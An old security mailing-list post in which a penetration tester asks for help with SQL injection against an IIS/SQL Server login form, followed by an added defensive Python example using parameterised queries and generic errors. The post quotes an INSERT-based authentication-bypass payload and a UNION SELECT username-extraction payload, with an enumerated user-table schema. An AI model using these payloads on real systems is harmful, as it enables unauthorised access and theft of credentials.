SQL table data enumeration help please.

From: Gary O'leary-Steele (GaryO@sec-1.com)
Date: Thu May 09 2002 - 15:47:43 EDT


Hi all,

I am currently performing a pen test against a web server using IIS with SQL
integration. There is a user name and password form which I want to bypass
and enumerate existing usernames and passwords.

I have discovered the following columns/table data:

tblusers.ID uniqueidentifier
tblusers.createdtimestamp smalldatetime
tblusers.sessionID nvarchar
tblUsers.LastUpdated smalldatetime
tblUsers.LastUpdatedIP nvarchar
tblUsers.LastUpdatedBy uniqueidentifier
tblUsers.CompanyType nvarchar
tblUsers.CompanyID uniqueidentifier
tblUsers.Password nvarchar
tblUsers.UserName nvarchar
tblUsers.Title nvarchar
tblUsers.Surname nvarchar
tblUsers.Forename nvarchar
tblUsers.AddressTo nvarchar
tblUsers.Appointment nvarchar
tblUsers.DirectPhone nvarchar
tblUsers.Mobile nvarchar
tblUsers.DirectEmail nvarchar
tblUsers.DirectFax nvarchar
tblUsers.Signature The text, ntext, and image data types are invalid in this subquery or aggregate expression.
tblUsers.Address1 nvarchar
tblUsers.Address2 nvarchar
tblUsers.Address3 nvarchar
tblUsers.Address4 nvarchar
tblUsers.Address5 nvarchar
tblUsers.PostCode nvarchar
tblUsers.HomePhone nvarchar
tblUsers.UserAccess bit

I want to update the table to bypass the auth screen.

I have tried:

-------------
www.target.comUserName='insert into
tblusers(createdtimestamp,sessionID,LastUpdated,LastUpdatedIP,LastUpdatedBy,
CompanyType,CompanyID,Password,username,title,surname,forename,AddressTo,App
ointment,DirectPhone,Mobile,DirectEmail,directfax,signature,address1,address
2,postcode,Homephone,UserAccess) values ('Oct 31 2000 8:52PM','7654','Oct 31
2000
8:52PM','127.0.0.1','','securitycompany','','test','test','mr','oleary','gar
y','addrto','appointment','01131234567','07796698919','garyo@sec-1.com',0113
1234567','sig','123','456','ls287sr','01132297541',1)--

------------

But had no joy.

In an attempt to gain access to data held with the username and password
fields I have tried:

www.target.com/UserName='Union select 1,1,1,1,1,1,1,1,min(UserName) from
tblusers where username >'a'--&password=hacker

but get "Operand type clash: uniqueidentifier is incompatible with int".

Any help would be greatly appreciated.
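
From the defender's side, the two behaviours this message depends on are a login query assembled from the form fields and database error text returned to the client. The following is an added example, not part of the original post, of a login check that closes both; it uses Python's sqlite3 as a stand-in for the SQL Server back end, and the reduced table layout, the sample user and all function names are assumptions.

```python
import hashlib
import hmac
import os
import sqlite3

GENERIC_FAILURE = "Invalid user name or password."

def _hash(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)

def make_db() -> sqlite3.Connection:
    # Constructed stand-in for tblUsers: salted hashes instead of a Password column.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE tblUsers (UserName TEXT PRIMARY KEY, "
               "Salt BLOB, PwHash BLOB, UserAccess INTEGER)")
    salt = os.urandom(16)
    db.execute("INSERT INTO tblUsers VALUES (?, ?, ?, 1)",
               ("alice", salt, _hash("correct horse", salt)))  # constructed user
    return db

def login(db: sqlite3.Connection, username: str, password: str):
    """Return (ok, message); the message never carries database error text."""
    try:
        # Form values are bound as parameters, so quotes, UNION or INSERT text
        # in them is compared as a literal string and never parsed as SQL.
        row = db.execute("SELECT Salt, PwHash FROM tblUsers "
                         "WHERE UserName = ? AND UserAccess = 1",
                         (username,)).fetchone()
    except sqlite3.Error:
        # Log the detail server-side; the client sees only the generic text.
        return False, GENERIC_FAILURE
    # Hash even when the user is unknown so both failure paths cost similar time.
    salt, stored = row if row else (b"\x00" * 16, b"")
    ok = hmac.compare_digest(_hash(password, salt), stored) and row is not None
    return (True, "OK") if ok else (False, GENERIC_FAILURE)

def user_count(db: sqlite3.Connection) -> int:
    return db.execute("SELECT COUNT(*) FROM tblUsers").fetchone()[0]

if __name__ == "__main__":
    db = make_db()
    # Input of the shape quoted in the post, passed as the UserName field.
    probe = "'Union select 1,1,1,1,1,1,1,1,min(UserName) from tblusers where username >'a'--"
    print(login(db, "alice", "correct horse"))
    print(login(db, probe, "hacker"))
    print(user_count(db))
```

Because every failure path returns the same message, the type-clash and subquery errors quoted in the post would appear only in server-side logs, where they are a useful detection signal.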
